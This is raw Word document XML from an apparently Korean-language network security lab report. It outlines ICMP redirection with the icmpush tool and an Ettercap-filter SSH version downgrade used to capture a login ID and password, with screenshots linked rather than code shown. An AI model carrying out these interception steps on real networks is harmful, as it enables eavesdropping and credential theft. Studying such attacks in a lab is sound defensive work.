          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS Spoofing </w:t>
      </w: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00300" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="66" name="그림 66" descr="https://lh6.googleusercontent.com/TxcxpzT3S17BOKQmE-ADVg8NPpojhwCmj34ieuKn85bOBSKcU3OfOiBMh3ramUUG29KHeNJ6LhrrH0I8kLIba8zJiAQG917VV3RRTrSS_mV8kVYYKwhxoWsvlgFy91mVu2L5be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TxcxpzT3S17BOKQmE-ADVg8NPpojhwCmj34ieuKn85bOBSKcU3OfOiBMh3ramUUG29KHeNJ6LhrrH0I8kLIba8zJiAQG917VV3RRTrSS_mV8kVYYKwhxoWsvlgFy91mVu2L5bel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69820" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67" name="그림 67" descr="https://lh4.googleusercontent.com/PwcCfJ4MEzk13goVgaLp7t1_6L8AbhMzalOKb57J05WqJsy3u7KvmH8iLZu51Sw00dBTKsUg3C_NPnqVC0zHA-QsONh0q_DJeimid5EShxdEuludFdqXaIjz4aBcIdjLkZ7F4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PwcCfJ4MEzk13goVgaLp7t1_6L8AbhMzalOKb57J05WqJsy3u7KvmH8iLZu51Sw00dBTKsUg3C_NPnqVC0zHA-QsONh0q_DJeimid5EShxdEuludFdqXaIjz4aBcIdjLkZ7F4RAT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P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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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가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루어졌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후</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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진행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0404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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0404FC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="000404FC">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CMP Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRPr="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:pStyle w:val="a4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방향 전환 요청이 꺼져있을 경우</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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53310" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="889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. 반향 전환 요청이 꺼져있을 때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36" cy="11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54580" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="69" name="그림 69" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzN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yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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격대상의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로 가서 방화벽 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">설정에 방향 전환 요청에 체크가 되어 있는지 확인 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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331720" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="그림 71" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYo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6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="그림 72" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJ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Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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>으로 가서 F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을 사용해 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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54580" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="73" name="그림 73" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzN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yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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다시 공격대상의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 돌아와 R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인해보면 변동이 없는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:pStyle w:val="a4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방향 전환 요청이 켜져 있을 경우</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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1240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="74" name="그림 74" descr="https://lh4.googleusercontent.com/v4zxhSbnaTuM8sMSjSxJirmrEL6Kk_MOQTU7ZqaT6pBtFKGOIKRDzslKmx1bCwaKNDp0oocdRiiipmrr6X1y_H2lxaKSboPc3tI9OgvO78WFG7Ze6Wq3IKKQ6QFgrL1THqCbTC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v4zxhSbnaTuM8sMSjSxJirmrEL6Kk_MOQTU7ZqaT6pBtFKGOIKRDzslKmx1bCwaKNDp0oocdRiiipmrr6X1y_H2lxaKSboPc3tI9OgvO78WFG7Ze6Wq3IKKQ6QFgrL1THqCbTC2v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24100" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="75" name="그림 75" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzN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yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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격대상의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로 가서 방화벽 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정에 방향 전환 요청에 체크가 되어 있는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:ind w:left="80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86000" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="그림 76" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYo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DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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4F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63140" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="77" name="그림 77" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJ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6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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>으로 가서 F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을 사용해 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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2293620" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="78" name="그림 78" descr="https://lh6.googleusercontent.com/OdGMdT8U5j_H-2TSV9KQMUxqwc037LvSBP5zka1MsRhan8NBWayIrsFoA1ettts4Hh1H6FN_UvC9zEw9D0MUw3RkmlLgpqoY0UBz3hoFtl0z63BrMSf1SyqXKdRcGgdbR_IzUl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OdGMdT8U5j_H-2TSV9KQMUxqwc037LvSBP5zka1MsRhan8NBWayIrsFoA1ettts4Hh1H6FN_UvC9zEw9D0MUw3RkmlLgpqoY0UBz3hoFtl0z63BrMSf1SyqXKdRcGgdbR_IzUl3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4FC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01240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="79" name="그림 79" descr="https://lh4.googleusercontent.com/Fqb9vlCHJb6F4LiSFO5SZhxEIyPXssZRVKxfKb24wnlrg3YCPU4ZijUxIy_fwkWWyTZd8DM6PvsQDDMMJEEHeFZBVu4GBJLEcA93lj8-sfN_yyRIlu_1zfgkImhdvIE6J6CAe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4.googleusercontent.com/Fqb9vlCHJb6F4LiSFO5SZhxEIyPXssZRVKxfKb24wnlrg3YCPU4ZijUxIy_fwkWWyTZd8DM6PvsQDDMMJEEHeFZBVu4GBJLEcA93lj8-sfN_yyRIlu_1zfgkImhdvIE6J6CAepC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P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뒤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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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했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테이블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추가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것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음</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Packet</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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볼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수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있는지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확인하기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위해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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격대상</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로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외부에</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="00CF524B" w:rsidP="000404FC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78380" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="80" name="그림 80" descr="https://lh4.googleusercontent.com/i5bu6kPipwyEZQsU4uUK-0ziLvnxsJk3uRxCsAy9p3jEnN0mNXKOh76r4NmYFbrDXnS4GcOaUvyCmVfhDLz4lwRcOc5WGeMWtKLUE3bmwa7iIZOMYvK41IFx9X8rgN2dHd7Et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i5bu6kPipwyEZQsU4uUK-0ziLvnxsJk3uRxCsAy9p3jEnN0mNXKOh76r4NmYFbrDXnS4GcOaUvyCmVfhDLz4lwRcOc5WGeMWtKLUE3bmwa7iIZOMYvK41IFx9X8rgN2dHd7Etdm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93620" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="81" name="그림 81" descr="https://lh5.googleusercontent.com/ECnMVCjZ1yT5-slySAkW5C7pvceGOXP0slF-07sFvRMo04CLDbckGQjX4_Jk2A4sFV9bBQECgQqDiiNH1G-WVRO06PRunUkdAexsnGcKPkGcVD5vsJWPLjtsRoxoLgYDbECfr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ECnMVCjZ1yT5-slySAkW5C7pvceGOXP0slF-07sFvRMo04CLDbckGQjX4_Jk2A4sFV9bBQECgQqDiiNH1G-WVRO06PRunUkdAexsnGcKPkGcVD5vsJWPLjtsRoxoLgYDbECfrs9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으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했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때</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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되는지</w:t>
      </w:r>
      <w:r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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ire Shark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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했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P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들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잡히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CF524B" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="000404FC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CF524B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SH </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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303020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="그림 82" descr="https://lh4.googleusercontent.com/c22sNTr_cCgkjQaHQWa4EBrx_uu88zgOi7ODeFYITLb4sXrpPpmqJVHFBMWpVNPRFX1pAoLywjm04HXyQKv_Q3NOd0Px70_xmcb3L-CoQNUDmiVt8bOxWNSxjpMd6srt_mteBV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4.googleusercontent.com/c22sNTr_cCgkjQaHQWa4EBrx_uu88zgOi7ODeFYITLb4sXrpPpmqJVHFBMWpVNPRFX1pAoLywjm04HXyQKv_Q3NOd0Px70_xmcb3L-CoQNUDmiVt8bOxWNSxjpMd6srt_mteBVjJ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13" cy="13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287780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="83" name="그림 83" descr="https://lh4.googleusercontent.com/dFNKgWutywzPiU8iSaI03-rxhRRQ_Jfi1EoosZdnNAky01rk4UdZC_94retn0QmFnu5puD5hSbkTKgREZ3IRvrRfE-gIQVC4lWxCejHAlP8-qzLG9zYNado0f-Vgi-2Bu8kjXn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4.googleusercontent.com/dFNKgWutywzPiU8iSaI03-rxhRRQ_Jfi1EoosZdnNAky01rk4UdZC_94retn0QmFnu5puD5hSbkTKgREZ3IRvrRfE-gIQVC4lWxCejHAlP8-qzLG9zYNado0f-Vgi-2Bu8kjXnj-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7" cy="12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SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버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협상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버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정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변경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하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한</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파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생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524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08860" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="84" name="그림 84" descr="https://lh5.googleusercontent.com/DvrcL77bN4-B5r7S1OqybDCAsLOM3VIuTV5ItJbYyf9OfpJ8kzJSJn0gfPqvydjSlwtBte805VGB7_IfyqnfwSZPnTby3OoT_tLiL3Sni7oHmikpdU2XGaKi1LeTgIUma6Z3dT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5.googleusercontent.com/DvrcL77bN4-B5r7S1OqybDCAsLOM3VIuTV5ItJbYyf9OfpJ8kzJSJn0gfPqvydjSlwtBte805VGB7_IfyqnfwSZPnTby3OoT_tLiL3Sni7oHmikpdU2XGaKi1LeTgIUma6Z3dTL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Ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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만든</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> etter.filter.ssh.co </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>필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/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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1493520" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="85" name="그림 85" descr="https://lh6.googleusercontent.com/bxBh1L7bd28mlbiv9y7jHCDb0dozeOf0AvZonYQgcysFZgdLMNaPkD6eU6zPO1fRl4hb6FSnUoD1nZwI9jpjyhHHVadlXzG6ruJcWU17Ho0dZGAZ9ULDrz_hmWx2l40MFrASpW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6.googleusercontent.com/bxBh1L7bd28mlbiv9y7jHCDb0dozeOf0AvZonYQgcysFZgdLMNaPkD6eU6zPO1fRl4hb6FSnUoD1nZwI9jpjyhHHVadlXzG6ruJcWU17Ho0dZGAZ9ULDrz_hmWx2l40MFrASpW6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1699260" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="86" name="그림 86" descr="https://lh4.googleusercontent.com/rxa3uQh8mpa6lteN-ksynsZlF9efCM33BAdtIimUV-BcpjatRMn8HnpTxTA6CuAa7JCWQx-lwhTHXyKKQLqpgHcwOFfB57xe8AakQ7J-OoEaI4FsNHY8NtEtSQwMRuh6D_zdCA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4.googleusercontent.com/rxa3uQh8mpa6lteN-ksynsZlF9efCM33BAdtIimUV-BcpjatRMn8HnpTxTA6CuAa7JCWQx-lwhTHXyKKQLqpgHcwOFfB57xe8AakQ7J-OoEaI4FsNHY8NtEtSQwMRuh6D_zdCAq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1737360" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="그림 87" descr="https://lh6.googleusercontent.com/QGzadvsIWEPStnIIQCNxQ3aECCCARjf31o2C0utPxbwHTUnYN8tcrNU4HxlzWlznseChtH3I1ZLHqzEec1miJeo7EWaR2jQUwU_xNnZaNGWTHw6qAeIjeUryfX2LtY6olfDp0y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6.googleusercontent.com/QGzadvsIWEPStnIIQCNxQ3aECCCARjf31o2C0utPxbwHTUnYN8tcrNU4HxlzWlznseChtH3I1ZLHqzEec1miJeo7EWaR2jQUwU_xNnZaNGWTHw6qAeIjeUryfX2LtY6olfDp0y_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DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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186940" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="106" name="그림 106" descr="https://lh4.googleusercontent.com/yhCfNrkyhIQhYU0IDP0KpR2QCGZplBllF2aTb3pbyZuJ1WOmIlR6qvSp8bT29EsAlVHs59wEtkEBpBg1mXdyDdcD1UHkC6hQl8BkuvQd62YzV-QAFUGzduIbeQZ-M3iT-kA-X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lh4.googleusercontent.com/yhCfNrkyhIQhYU0IDP0KpR2QCGZplBllF2aTb3pbyZuJ1WOmIlR6qvSp8bT29EsAlVHs59wEtkEBpBg1mXdyDdcD1UHkC6hQl8BkuvQd62YzV-QAFUGzduIbeQZ-M3iT-kA-XN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86000" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="107" name="그림 107" descr="https://lh3.googleusercontent.com/RIlC0BUhDq8X9-OYF1yF1u9tz3YkB71Jb1VhzKtvgnbGO0qEd1uK8-12ytqgIp_S78GqzAfTXn8kvoiTjmw7m9LkBvIUp8-BeCTUqpfe8rT723zSHvL7kCfXsJUV7ktTAdjYNF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lh3.googleusercontent.com/RIlC0BUhDq8X9-OYF1yF1u9tz3YkB71Jb1VhzKtvgnbGO0qEd1uK8-12ytqgIp_S78GqzAfTXn8kvoiTjmw7m9LkBvIUp8-BeCTUqpfe8rT723zSHvL7kCfXsJUV7ktTAdjYNFz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해보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버전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다운그레이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했다는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것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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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사용했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아이디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비밀번호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가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
